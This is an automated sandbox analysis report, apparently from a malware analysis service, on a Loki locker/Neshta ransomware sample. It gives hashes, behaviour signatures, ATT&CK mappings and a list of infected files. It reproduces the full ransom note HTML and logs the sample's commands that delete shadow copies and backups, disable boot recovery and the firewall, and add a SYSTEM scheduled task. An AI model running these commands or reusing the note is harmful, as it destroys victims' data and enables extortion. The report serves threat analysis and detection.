Overview

overview

10

Static

static

10

2024-10-25...ry.exe

windows7-x64

10

2024-10-25...ry.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    25-10-2024 04:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe

  • Size

    520KB

  • MD5

    9da2c0bd42d714d127f2756671426972

  • SHA1

    e879856aa0d650acc31de610f6de30e70efbee7b

  • SHA256

    3006f4700c203366244df77f5f45caae705d79540c65769bd71292eba0fbe7d2

  • SHA512

    b5a353809f6076f3effc865c70cabc0079fb01612e08afb14a7947827e3a3149f2e2ba415fce949670065d4e8530e6d243f42e4037a6f871fde027f6a0840229

  • SSDEEP

    6144:k9iBKeyvrf7JR4CDFudez0e9YaVX0cBdxLPlk3XrvPVdNT6zncVUJKWehinom6r4:crDQ0FXzWazdxWrlTT6zncVUJ7vnd6r4

Score
10/10
neshtadefense_evasiondiscoveryevasionexecutionimpactpersistenceprivilege_escalationransomwarespywarestealertrojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\info.hta

Ransom Note
<html> <head> <title>Loki locker</title> <HTA:APPLICATION ICON='msiexec.exe' WINDOWSTATE="maximize" SINGLEINSTANCE='yes' SysMenu="no" contextmenu="no" scroll="yes"/> <meta http-equiv="x-ua-compatible" content="IE=9"/> </head> <style type="text/css"> body{background-color: #000000; font-family: Arial, Helvetica, sans-serif;}#t{text-align: center; color: #FF0000; font-weight: bold; font-size: 1.51vw; margin-bottom: 0;}p{text-align: center; font-size: 1vw; color: white; margin-bottom: 0;}.t{text-align: left; margin-left: 2px;}.pt{color: white; font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; font-size: 1.1vw;}.b{padding: 2px; outline: none;}ul{font-size: 1vw;}.m{background: rgb(189, 54, 54); padding: 1px 5px; font-weight: bold;}#tm{color: red; text-align: center; border-bottom: 0; font-size: 2vw;}</style> <script>var countDownDate = new Date(2024,10,24,4,40,51).getTime(); var x = setInterval(function () { var now = new Date().getTime(); var distance = countDownDate - now; var days = Math.floor(distance / (1000 * 60 * 60 * 24)); var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60)); var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60)); var seconds = Math.floor((distance % (1000 * 60)) / 1000); document.getElementById("tm").innerHTML = days + "d," + hours + ":" + minutes + ":" + seconds + " LEFT TO LOSE ALL OF YOUR FILES"; if (distance < 0) { clearInterval(x); document.getElementById("tm").innerHTML = "TIMER IS UP.SAY BYE TO YOUR FILES :)"; WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("C:\\ProgramData\\winlogon.exe", 1, false);}}, 1000); </script> <body > <h1 id="t">All your files have been encrypted by Loki locker!</h1> <h2 id="tm"></h2> <p>All your files have been encrypted due to a security problem with your PC. <br>If you want to restore them, please send an email <span class="m">[email protected]</span> </p><br><p class="t"> You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. <br>After payment we will send you the decryption tool. <br>You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay <b>Double</b>. <br>In case of no answer in 24 hours (1 Day) write to this email <span class="m">[email protected]</span> <br>Your unique ID is : <span class="m">4F3D5994</span> </p><br><div class="b" style="background-color: #FF0000;"> <div class="pt">You only have LIMITED time to get back your files!</div><ul style="color: white; margin-top: 0;"> <li>If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED.</li><li>You will lose some of your data on day 2 in the timer.</li><li>You can buy more time for pay. Just email us.</li><li>THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) </li></ul> </div><br><div class="b" style="background-color: rgb(78, 78, 78);"> <div class="pt">What is our decryption guarantee?</div><ul style="color: white; margin-top: 0;"> <li>Before paying you can send us up to <u>3 test files</u> for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)</li></div><br><div class="b" style="background-color: #FF0000;"> <div class="pt">Attention!</div><ul style="color: white; margin-top: 0;"> <li><u><b>DO NOT</b> pay any money before decrypting the test files.</u></li><li><u><b>DO NOT</b> trust any intermediary.</u> they wont help you and you may be victim of scam. just email us , we help you in any steps.</li><li><u><b>DO NOT</b> reply to other emails.</u> ONLY this two emails can help you.</li><li>Do not rename encrypted files.</li><li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li><li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li></ul> </div></body> </html>
Emails

class="m">[email protected]</span>

class="m">[email protected]</span>
URLs

http-equiv="x-ua-compatible"

Signatures

  • Detect Neshta payload 34 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
    evasiontrojan
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

    persistencespywareneshta
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Disables Task Manager via registry modification
    evasion
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Drops startup file 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
    persistence
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops desktop.ini file(s) 38 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Control Panel 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
    adwarespyware
  • Modifies registry class 8 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system executable filetype association
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Users\Admin\AppData\Local\Temp\3582-490\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe"
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Modifies Control Panel
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:2680
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3024
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2960
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kevqow5v\kevqow5v.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2588
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES670D.tmp" "c:\ProgramData\CSC2989BC7BA7734E57B0976BBAB850ADA3.TMP"
          4⤵
            PID:1976
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2376
          • C:\Windows\system32\vssadmin.exe
            vssadmin delete shadows /all /quiet
            4⤵
            • Interacts with shadow copies
            PID:2676
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1740
          • C:\Windows\system32\wbadmin.exe
            wbadmin DELETE SYSTEMSTATEBACKUP
            4⤵
            • Deletes System State backups
            • Drops file in Windows directory
            PID:2572
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2908
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic shadowcopy delete
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:476
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1804
          • C:\Windows\system32\wbadmin.exe
            wbadmin delete catalog -quiet
            4⤵
            • Deletes backup catalog
            PID:2176
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2268
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} bootstatuspolicy ignoreallfailures
            4⤵
            • Modifies boot configuration data using bcdedit
            PID:700
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2340
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} recoveryenabled no
            4⤵
            • Modifies boot configuration data using bcdedit
            PID:1716
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2420
          • C:\Windows\system32\netsh.exe
            netsh advfirewall set currentprofile state off
            4⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:936
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2692
          • C:\Windows\system32\netsh.exe
            netsh firewall set opmode mode=disable
            4⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:2172
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta"
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          PID:2244
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta"
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          PID:2588
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta"
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          PID:1160
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta"
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          PID:2568
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta"
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          PID:2188
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1724
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1232
    • C:\Windows\System32\vdsldr.exe
      C:\Windows\System32\vdsldr.exe -Embedding
      1⤵
        PID:2316
      • C:\Windows\System32\vds.exe
        C:\Windows\System32\vds.exe
        1⤵
          PID:1644

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        2
        T1059

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Windows Management Instrumentation

        1
        T1047

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Create or Modify System Process

        2
        T1543

        Windows Service

        2
        T1543.003

        Event Triggered Execution

        2
        T1546

        Change Default File Association

        1
        T1546.001

        Netsh Helper DLL

        1
        T1546.007

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Create or Modify System Process

        2
        T1543

        Windows Service

        2
        T1543.003

        Event Triggered Execution

        2
        T1546

        Change Default File Association

        1
        T1546.001

        Netsh Helper DLL

        1
        T1546.007

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Defense Evasion

        Direct Volume Access

        1
        T1006

        Impair Defenses

        2
        T1562

        Disable or Modify System Firewall

        1
        T1562.004

        Disable or Modify Tools

        1
        T1562.001

        Indicator Removal

        4
        T1070

        File Deletion

        4
        T1070.004

        Modify Registry

        6
        T1112

        Credential Access

        Credentials from Password Stores

        1
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Unsecured Credentials

        1
        T1552

        Credentials In Files

        1
        T1552.001

        Discovery

        Peripheral Device Discovery

        1
        T1120

        Query Registry

        2
        T1012

        System Information Discovery

        2
        T1082

        System Location Discovery

        1
        T1614

        System Language Discovery

        1
        T1614.001

        Lateral Movement

        Collection

        Data from Local System

        1
        T1005

        Command and Control

        Exfiltration

        Impact

        Defacement

        1
        T1491

        Inhibit System Recovery

        5
        T1490

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe
          Filesize

          547KB

          MD5

          cf6c595d3e5e9667667af096762fd9c4

          SHA1

          9bb44da8d7f6457099cb56e4f7d1026963dce7ce

          SHA256

          593e60cc30ae0789448547195af77f550387f6648d45847ea244dd0dd7abf03d

          SHA512

          ff4f789df9e6a6d0fbe12b3250f951fcf11e857906c65e96a30bb46266e7e1180d6103a03db2f3764e0d1346b2de7afba8259ba080057e4a268e45e8654dfa80

          Download Submit

        • C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\DW20.EXE
          Filesize

          859KB

          MD5

          e0c1e167396dafbdc9678b08751e4f67

          SHA1

          5482b73da151f9a15bf189c88fbb47ec37799698

          SHA256

          9d554d697232741e3c898ef5217ce599d7c2b13d7a91e46c2e1bbdf5f76997c3

          SHA512

          ae1d463e60d6f1f78cafd2232841e9d91dabcf811b3cb0a1caf71b179fb644c9a62236c87b6b6e437b3de2b86707fbfab8888d39952e836b0292c0a5f5c08252

          Download Submit

        • C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE
          Filesize

          859KB

          MD5

          02ee6a3424782531461fb2f10713d3c1

          SHA1

          b581a2c365d93ebb629e8363fd9f69afc673123f

          SHA256

          ead58c483cb20bcd57464f8a4929079539d634f469b213054bf737d227c026dc

          SHA512

          6c9272cb1b6bde3ee887e1463ab30ea76568cb1a285d11393337b78c4ad1c3b7e6ce47646a92ab6d70bff4b02ab9d699b84af9437b720e52dcd35579fe2693ec

          Download Submit

        • C:\Program Files (x86)\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
          Filesize

          571KB

          MD5

          d4fdbb8de6a219f981ffda11aa2b2cc4

          SHA1

          cca2cffd4cf39277cc56ebd050f313de15aabbf6

          SHA256

          ba3dc87fca4641e5f5486c4d50c09d087e65264e6c5c885fa6866f6ccb23167b

          SHA512

          7167e13dbcc8c96114fef5fc7ae19afa31173617db153dd283aa6d8256f6b8c09c8f906f5d418efe9f7f242cdfaef24b93c11c451701c4d56eb48d18de4e88bf

          Download Submit

        • C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE
          Filesize

          158KB

          MD5

          478127e8ae1e0d7681f5ac7906368158

          SHA1

          aa231d55beb68c7ad1bf8e3168d61b688ea7bbfa

          SHA256

          19e296cc909cac389f8e7f8f0d4e589f43ee082b1dc68a6cba0d2865077382f1

          SHA512

          5ef1684f9e8da4f9fe7839db76891c4fc6add0285df46477dc655ce380486d266a978bab373b08366e800b12475609aa0cdf1f48a9ba887e35b7a8945bb6bfa4

          Download Submit

        • C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\LICLUA.EXE
          Filesize

          229KB

          MD5

          28f7305b74e1d71409fec722d940d17a

          SHA1

          4c64e1ceb723f90da09e1a11e677d01fc8118677

          SHA256

          706db4d832abdf4907a1386b917e553315660a59bfb4c180e38215b4a606d896

          SHA512

          117de88d0bc437023ca2f1f54b1f2cf03b00c8cb52e4b728cabcb3140659c67cdb6d2c203d3ca13767312831c6308622dfa65d6c5361ec28aaf4ec0870f9ba6e

          Download Submit

        • C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOICONS.EXE
          Filesize

          503KB

          MD5

          3f67da7e800cd5b4af2283a9d74d2808

          SHA1

          f9288d052b20a9f4527e5a0f87f4249f5e4440f7

          SHA256

          31c10320edb2de22f37faee36611558db83b78a9c3c71ea0ed13c8dce25bf711

          SHA512

          6a40f4629ddae102d8737e921328e95717274cea16eb5f23bff6a6627c6047d7f27e7f6eb5cb52f53152e326e53b6ee44d9a9ee8eca7534a2f62fa457ac3d4e3

          Download Submit

        • C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOXMLED.EXE
          Filesize

          153KB

          MD5

          12a5d7cade13ae01baddf73609f8fbe9

          SHA1

          34e425f4a21db8d7902a78107d29aec1bde41e06

          SHA256

          94e8ea2ed536484492d746f6f5808192cb81ae3c35f55d60826a2db64a254dd5

          SHA512

          a240f5c59226749792cfb9fbd76b086d2544a493b834a72c0bfd8b076ed753ec8876ff056fc35f63f5497183d985f8f8c5c7b6abbcad70981f1ec83af1b3bd76

          Download Submit

        • C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE
          Filesize

          186KB

          MD5

          58b58875a50a0d8b5e7be7d6ac685164

          SHA1

          1e0b89c1b2585c76e758e9141b846ed4477b0662

          SHA256

          2a0aa0763fdef9c38c5dd4d50703f0c7e27f4903c139804ec75e55f8388139ae

          SHA512

          d67214077162a105d01b11a8e207fab08b45b08fbfba0615a2ea146e1dd99eea35e4f02958a1754d3192292c00caf777f186f0a362e4b8b0da51fabbdb76375b

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\1033\ONELEV.EXE
          Filesize

          85KB

          MD5

          685db5d235444f435b5b47a5551e0204

          SHA1

          99689188f71829cc9c4542761a62ee4946c031ff

          SHA256

          fde30bfdd34c7187d02eabe49f2386b4661321534b50032a838b179a21737411

          SHA512

          a06d711574fbe32f07d20e1d82b7664addd664bf4a7ee07a8f98889172afe3653f324b5915968950b18e76bbfc5217a29704057fd0676611629aa9eb888af54a

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\ACCICONS.EXE
          Filesize

          1.4MB

          MD5

          71509f22e82a9f371295b0e6cf4a79bb

          SHA1

          c7eefb4b59f87e9a0086ea80962070afb68e1d27

          SHA256

          f9837240f5913bfa289ac2b5da2ba0ba24f60249d6f7e23db8a78bb10c3c7722

          SHA512

          3ea6347bbb1288335ac34ee7c3006af746ca9baccfbc688d85a5ca86b09d3e456047239c0859e8dd2cdc22d254897fccd0919f00826e9665fd735cfb7c1554e7

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\CLVIEW.EXE
          Filesize

          246KB

          MD5

          4f8fc8dc93d8171d0980edc8ad833b12

          SHA1

          dc2493a4d3a7cb460baed69edec4a89365dc401f

          SHA256

          1505f3721dd3d7062dadde1633d17e4ee80caf29fd5b6aa6e6a0c481324ffd4e

          SHA512

          bdc3f83d7428418516daf23a9c2d00571cbaa3755391dfd8c500b6df7f621a67ad8e27775bcdaa20b159cd77d08bcdaf81a0cb7fffdd812978888d43512113a6

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\CNFNOT32.EXE
          Filesize

          188KB

          MD5

          92ee5c55aca684cd07ed37b62348cd4e

          SHA1

          6534d1bc8552659f19bcc0faaa273af54a7ae54b

          SHA256

          bee98e2150e02ad6259184a35e02e75df96291960032b3085535fb0f1f282531

          SHA512

          fc9f4569a5f3de81d6a490f0fff4765698cdc891933979a3ce661a6291b606630a0c2b15647fc661109fcea466c7a78552b9cfbca6c5b2079ea1632a9f1b6e22

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\GRAPH.EXE
          Filesize

          4.1MB

          MD5

          56f047ff489e52768039ce7017bdc06e

          SHA1

          3f249d6a9e79c2706ed2e0e12f7e76ebd5e568fc

          SHA256

          62d6c979d708efe21c9618a18232fd2c74e85bb9560daa298025ab9af784202d

          SHA512

          a2eae7eae6548d325480560dcca83283a022f00f7d9bd19c0ae801a7acec133a33c5c5eb79432d47c8258d153cadea988217845d58eb4e8aa8070a068befe5e8

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\GROOVEMN.EXE
          Filesize

          962KB

          MD5

          06ac9f5e8fd5694c759dc59d8a34ee86

          SHA1

          a29068d521488a0b8e8fc75bc0a2d1778264596b

          SHA256

          ab6a5bfc12229c116033183db646125573989dfc2fc076e63e248b1b82f6751d

          SHA512

          597dfd9cb82acc8f3033f2215df7138f04445f5826054528242e99e273f9cc4a7a956c75f280e6145fcdb22824a1f258246e22637de56a66dcae72ac2c1d14fe

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\INFOPATH.EXE
          Filesize

          1.7MB

          MD5

          33cb3cf0d9917a68f54802460cbbc452

          SHA1

          4f2e4447fabee92be16806f33983bb71e921792b

          SHA256

          1230b2032d2d35a55cd86d1215eb38fa18bcf590c3c19b9ac4dda5350c24e10a

          SHA512

          851f0a098020cb1da3f5f48febce3b9eaef3b885df9134b3fb6b364f3a7572a8c516456710a15f66f0a44eff59cfa50f2dc8bb5d274e5c093294b2ea96fd49cb

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.EXE
          Filesize

          110KB

          MD5

          4d5a0a65ecccd0e5736e7678ab5f138b

          SHA1

          e1ee01e546bcbcd31003d22a73bfebc872fa9c2e

          SHA256

          38d512591953251de091fc8c7db4b4f9a3d3582ab5553ecf2f22c840a3eda43f

          SHA512

          e80eaa2193716404be5225f83ebf5b13dbb974dbbc6880d5128022c892b4fd09e6065f063dc6a31cd99591f1b129d1aaf0669508633e759ca8893e21e4432b28

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
          Filesize

          741KB

          MD5

          5d2fd8de43da81187b030d6357ab75ce

          SHA1

          327122ef6afaffc61a86193fbe3d1cbabb75407e

          SHA256

          4d117648525a468532da011f0fc051e49bf472bbcb3e9c4696955bd398b9205f

          SHA512

          9f7470978346746b4e3366f9a6b277aa747cc45f13d36886fc16303221565d23348195b72ac25f7b1711789cd7cb925d7ceea91e384ef4f904a4e49b4e06d9b2

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\MSOUC.EXE
          Filesize

          392KB

          MD5

          25b9301a6557a958b0a64752342be27d

          SHA1

          0887e1a9389a711ef8b82da8e53d9a03901edebc

          SHA256

          5d916f7c7f6cb6cfd7545a57cb9c9d9c6df16af3517298c346901081a9135303

          SHA512

          985f6b2fcac2f0425a1a339a55616012879a393caa747412d04c1ee4de3b12aff2cc051860066d84ecbeae335eaa5116ccb8a02090a2674eded367378c56b1ab

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\MSQRY32.EXE
          Filesize

          694KB

          MD5

          7a4edc8fb7114d0ea3fdce1ea05b0d81

          SHA1

          02ecc30dbfab67b623530ec04220f87b312b9f6b

          SHA256

          ff16fdc703e55ddfe5ee867f343f3b20b496e7199c6c4b646335a01026f74550

          SHA512

          39519685b1dd872008abfa967f79fd3b7a5e6f6ee1b9c3de891aae64490b2d0feb56bcd3f5dab4527d2c6d07646db5966028df153f38a1c09ee88a1ba9a1ef44

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\MSTORDB.EXE
          Filesize

          726KB

          MD5

          c3ee902099b98a299b1a215aba1b27bb

          SHA1

          602b023806464db25f5f8e4ffc157cc7d7e9886b

          SHA256

          e657a9f85af7cb5ded734e162db514e466256a83d51f4454abbf19c54b30686f

          SHA512

          3538548c99f266404395ce9bdcadb542171799865ac5feddce936305ff2b09ecb939bed60d1e7011a39ca8548af39f9b4ee723b15674a1df54404270fc5afc9f

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\MSTORE.EXE
          Filesize

          144KB

          MD5

          a2dddf04b395f8a08f12001318cc72a4

          SHA1

          1bd72e6e9230d94f07297c6fcde3d7f752563198

          SHA256

          b35e60f1551870c1281d673380fe3101cd91b1f0b4d3c14c2383060f5e120373

          SHA512

          2159df98d90467720b738be68bee5aba38980d2449c18d2ea4b7b9bae7d222b4a85845d0f9597017d0ee417964190bc3d95cb4809e33aac16b6cfa6ec200dce3

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\NAMECONTROLSERVER.EXE
          Filesize

          127KB

          MD5

          154b891ad580307b09612e413a0e65ac

          SHA1

          fc900c7853261253b6e9f86335ea8d8ad10c1c60

          SHA256

          8a3598c889dbcb1dca548a6193517ed7becb74c780003203697a2db22222a483

          SHA512

          39bf032033b445fc5f450abec298ea3f71cadecfeafc624f2eb1f9a1d343a272181a874b46b58bb18168f2f14d498c3b917c3392d4c724fe4e5ae749113c2ad6

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\OIS.EXE
          Filesize

          308KB

          MD5

          4545e2b5fa4062259d5ddd56ecbbd386

          SHA1

          c021dc8488a73bd364cb98758559fe7ba1337263

          SHA256

          318f1f3fbdd1cf17c176cb68b4bc2cf899338186161a16a1adc29426114fb4f8

          SHA512

          cf07436e0219ca5868e11046f2a497583066a9cf68262e7cca22daad72aded665ac66afea8db76182c172041c45fcef1628ea6852751c4bf97969c9af6cfefa1

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE
          Filesize

          1.6MB

          MD5

          08ee3d1a6a5ed48057783b0771abbbea

          SHA1

          ebf911c5899f611b490e2792695924df1c69117d

          SHA256

          3f6decd82b72a5ba1ee224b52d9fbd6486be22a0b855e28eaad47ae92df266f0

          SHA512

          1711d023c60d4b047d553a654797bc3a2eecd951b310698c1a2c549e136c33f55e0fc1167a4a38f793b7796f7cfc3fb30017935127b147a21da2812eb38faac5

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
          Filesize

          262KB

          MD5

          2d1b4a44f1f9046d9d28e7e70253b31d

          SHA1

          6ab152d17c2e8a169956f3a61ea13460d495d55e

          SHA256

          d1d73220342ff51a1514d2354654c6fcaedc9a963cb3e0a7e5b0858cfc5c5c7d

          SHA512

          dd8f5e343417a3e131b3362f1aecaf9ce0f8a55c9f90aa3b7e55b6ddb6c5f4e06b3e76a7f4481fa13e2f325ab2490553f6977178acf7c486c7315755c05fc7c3

          Download Submit

        • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
          Filesize

          2.1MB

          MD5

